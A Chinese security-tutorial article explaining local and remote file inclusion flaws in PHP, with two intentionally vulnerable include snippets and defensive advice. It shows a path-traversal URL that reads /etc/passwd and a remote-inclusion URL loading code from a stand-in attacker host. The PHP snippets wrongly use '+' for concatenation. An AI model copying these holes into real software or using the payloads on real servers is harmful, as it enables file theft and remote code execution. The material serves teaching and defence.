首页 网络安全 安全学院 查看内容

文件包含(LFI & RFI)攻击

2022-11-29 00:24 |原作者: 血超级厚的土豆 1673 0

摘要: 介绍文件包含漏洞利用应用程序中的动态文件包含机制,从不受信任的源导入恶意的可执行代码。通常当应用程序接受用户输入并将其传递到文件包含API时就会引发这类的漏洞,从而在易受攻击的应用程序上下文中加载恶意代 ...
关键词: 文件 应用程序 包含 代码 template 攻击者 执行 漏洞 PHP 用户

介绍

文件包含漏洞利用应用程序中的动态文件包含机制,从不受信任的源导入恶意的可执行代码。通常当应用程序接受用户输入并将其传递到文件包含API时就会引发这类的漏洞,从而在易受攻击的应用程序上下文中加载恶意代码。

通常,当漏洞允许在目标服务器上加载文件时称为本地文件包含(LFI),当攻击者能够在应用程序中加载远程代码时称为远程文件包含(RFI),这种技术增加了在目标服务器上执行恶意代码的机会。

影响及危害

此类漏洞的影响取决于应用程序如何使用所包含的文件,可能表现为基本的任意文件读取、还可以是服务器端请求伪造,甚至远程代码执行(RCE)。

如果文件在应用程序的相同代码上下文中运行,这可能被用于在托管基础设施中执行远程代码(RCE)从而获得立足点,转向横向移动到整个网络中的其他服务系统执行未经授权的命令,并完全损害应用程序的机密性、完整性和可用性。

场景

在许多语言中都可能包含未经授权的文件,PHP特别容易受到RFI攻击,因为动态包含文件是PHP编程中广泛使用的模式。

下面的代码片段存在LFI问题,用于通过用户提供的HTTP参数“template”,动态加载指定的本地PHP文件。

<?php include("templates/" + $_GET['template']); ?>

攻击者可以通过向参数“template”传递恶意的本地路径来访问存在漏洞的PHP网页,进而访问不被允许的本地文件,例如/page. PHP ?template=../../../etc/passwd显示系统密码文件,或者/page.php?template=../upload/file以PHP脚本的形式运行一个意外文件。

下面的RFI片段提供了对路径的第一部分的完全控制,允许攻击者加载远程url。

<?php include($_GET['template'] + ".php"); ?>

攻击者可以在他控制的web服务器上驻留恶意PHP文件,然后通过访问/page.php?template=
http://www.attackerwebsite.com/malicious ,在目标服务器上执行该malicious文件。

如何防护

可能的话,开发人员应该避免使用用户提供的输入构建文件路径字符串,特别是当资源公开给用户或在运行执行时。


如果需要将用户提供的输入传递给文件系统API,开发人员必须确保以下内容:

1.严格要求只接受已知的、信誉良好的候选对象来验证用户输入。

2.如果无法根据允许列表进行验证,那么验证至少应该确保输入中只包含允许的内容。

本文出处: https://www.toutiao.com/article/7170872932879598132/
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部